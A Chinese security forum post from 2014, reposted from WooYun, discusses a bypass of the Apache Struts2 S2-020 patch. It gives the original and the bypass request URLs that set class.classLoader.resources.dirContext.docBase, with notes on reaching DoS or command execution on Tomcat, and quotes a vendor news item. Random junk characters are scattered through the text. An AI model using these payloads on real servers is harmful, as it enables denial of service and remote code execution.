之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
1 u# p" f/ C d8 c! ^
/ \. c7 [3 K- ~# T5 D% F暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test5 X# S Y% E9 w
" k" W" s, U7 s/ Z[color=rgb(51, 102, 153) !important]复制代码
# G& i9 x( y8 n7 b
3 F, E( f! ^# t! J2 _绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx
! [& H4 b; g/ A* z8 |" y* P
. h3 h3 ]2 P" l" x! @8 O( ]8 R
[color=rgb(51, 102, 153) !important]复制代码5 `" O8 Y p/ ?! u
& o7 U/ D0 G. u. }9 W顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。
0 Q, C5 l$ M, ^9 y/ @; l% { X( h加速乐发了新闻: 4 d, _' a& j/ v0 i G
http://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
' _' |2 E1 a$ z0 C4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。
4 H8 j. [" z' v; c6 n
/ S$ X6 D- v9 |% m据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。% M2 a* c2 d' X: q6 `% y
4 ?: p9 H, B4 @1 B
1 ?4 o" d5 |% @, f3 E$ K' e
[* f& n; W& t6 y转载自乌云$ y$ p5 h9 ]: v* H6 B$ {
原文链接:http://zone.wooyun.org/content/11876* s9 {( T$ ]6 [* S3 Z& F) f) p- R
|
发表于 2014-4-27 19:10:10
收藏
支持
反对